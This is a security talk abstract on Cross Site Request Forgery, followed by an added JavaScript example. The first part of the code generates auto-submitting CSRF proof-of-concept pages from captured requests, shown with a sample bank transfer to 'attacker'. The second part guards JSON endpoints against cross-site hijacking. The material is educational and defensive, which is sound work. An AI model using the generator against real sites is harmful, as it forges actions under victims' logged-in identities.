The Three Faces of CSRF presented at DeepSec 2007

by Martin Johns

Summary:

Even though Cross Site Request Forgery (CSRF) vulnerabilities have made it into the OWASP Top 10 [1], this vulnerability class is still often ignored and almost always belittled. While in 2006 alone 1282 XSS vulnerabilities were collected by the CWE project, only 5 (!) CSRF issues were recorded in the same timeframe [2].

This talk will discuss the various existing CSRF attack vectors and exemplify the issues with real world examples:

* Executing arbitrary actions on the web application using the attacked user's identity and authentication context
* Subverting the company's firewall and exploring the intranet
* Leaking sensitive information via hijacking JSON data

Furthermore, we will demonstrate how a simple CSRF exploit can be created semi-automatically in less than 5 minutes. The last quarter of the talk will be devoted to a brief overview of our client-side CSRF protection tools RequestRodeo [3] and LocalRodeo [4].

[1] OWASP Top 10: http://www.owasp.org/index.php/Top_10_2007
[2] Vulnerability Type Distributions in CVE: http://cwe.mitre.org/documents/vuln-trends/index.html
[3] RequestRodeo: http://www.nongnu.org/requestrodeo/
[4] LocalRodeo: http://databasement.net/labs/localrodeo/
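The following is an added example, written for this page; it is not code from the talk and has nothing to do with RequestRodeo or LocalRodeo. It illustrates two of the vectors listed above from both sides: a small generator that turns a captured state-changing request into a CSRF proof-of-concept page (the "exploit in a few minutes" idea, first bullet), and the server- and client-side guard that keeps a JSON endpoint from being read cross-site through a `<script src>` include (third bullet). All function names (`buildCsrfPoc`, `replayBlocker`, `wrapJson`, `unwrapJson`, `allowJsonRequest`, `parsesAsScript`), the token-name heuristic, the `)]}',` prefix and the sample request and JSON payload are assumptions made for the example.

```javascript
'use strict';
// Added example for this abstract, not code from the talk or from
// RequestRodeo/LocalRodeo. Part 1 generates a CSRF proof of concept from a
// captured request; part 2 guards a JSON endpoint against script inclusion.
// The captured request and the JSON payload are constructed samples.

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' })[c]);
}

// --- Part 1: CSRF proof-of-concept generator --------------------------------

// Assumed heuristic: parameter names that suggest an anti-CSRF token. Blind
// replay of such a request will almost certainly fail, so we refuse to emit
// a PoC that merely looks like it works.
const TOKEN_NAME_RE = /csrf|xsrf|token|nonce|authenticity/i;

// Returns a reason the captured request cannot be replayed from an attacker
// page with a plain HTML form, or null if it can.
function replayBlocker(req) {
  if (!['GET', 'POST'].includes(req.method)) {
    return 'HTML forms can only issue GET or POST';
  }
  if (Object.keys(req.params).some((name) => TOKEN_NAME_RE.test(name))) {
    return 'request carries what looks like an anti-CSRF token';
  }
  return null;
}

// Builds a page that, opened by a victim who is logged in to the target,
// re-issues the captured request with the victim's cookies attached.
// Returns null when replayBlocker() reports a problem.
function buildCsrfPoc(req) {
  if (replayBlocker(req) !== null) return null;
  const inputs = Object.entries(req.params)
    .map(([k, v]) =>
      `  <input type="hidden" name="${escapeHtml(k)}" value="${escapeHtml(v)}">`)
    .join('\n');
  return [
    '<!doctype html>',
    `<form id="csrf" method="${escapeHtml(req.method)}" action="${escapeHtml(req.url)}">`,
    inputs,
    '</form>',
    "<script>document.getElementById('csrf').submit();</script>",
    '',
  ].join('\n');
}

// --- Part 2: JSON hijacking guard -------------------------------------------

// A JSON array is also a valid JavaScript program, which is what lets an
// attacker page load an authenticated JSON endpoint via <script src>. This
// prefix turns the body into a syntax error, so the include executes nothing;
// the legitimate same-origin client strips it before JSON.parse.
const JSON_GUARD_PREFIX = ")]}',\n";

function wrapJson(value) {
  return JSON_GUARD_PREFIX + JSON.stringify(value);
}

function unwrapJson(body) {
  if (!body.startsWith(JSON_GUARD_PREFIX)) {
    throw new Error('missing JSON guard prefix');
  }
  return JSON.parse(body.slice(JSON_GUARD_PREFIX.length));
}

// Request-side guard: <script src> and <form> cannot set custom headers, and a
// cross-site XMLHttpRequest that sets one triggers a CORS preflight the target
// must explicitly approve. Requiring POST additionally rules out script tags.
function allowJsonRequest(method, headers) {
  const h = Object.fromEntries(
    Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v]));
  return method === 'POST' && h['x-requested-with'] === 'XMLHttpRequest';
}

// Would this body run if included via <script src>? Parsing it as a function
// body is enough to tell; new Function() parses without executing.
function parsesAsScript(body) {
  try {
    new Function(body);
    return true;
  } catch (e) {
    return false;
  }
}

// Constructed sample: a captured form POST that changes state.
const SAMPLE_REQUEST = {
  method: 'POST',
  url: 'http://bank.example/transfer',
  params: { to: 'attacker', amount: '1000', memo: '<b>"thanks"</b>' },
};

// Constructed sample: authenticated JSON that must not leak cross-site.
const SAMPLE_JSON = [{ user: 'alice', email: 'alice@example.org' }];

console.log(buildCsrfPoc(SAMPLE_REQUEST));
console.log('bare JSON runs as a script:', parsesAsScript(JSON.stringify(SAMPLE_JSON)));
console.log('guarded JSON runs as a script:', parsesAsScript(wrapJson(SAMPLE_JSON)));
```

The generator only covers form-encoded GET and POST, which is what an HTML form can send; the token heuristic is a hint for the tester, not proof that the target is safe. On the defence side, the custom-header check and the prefix are complementary: the header check stops the request from being served at all to the vectors above, and the prefix makes the response useless even where a request does get through. Neither replaces a per-session anti-CSRF token on state-changing actions.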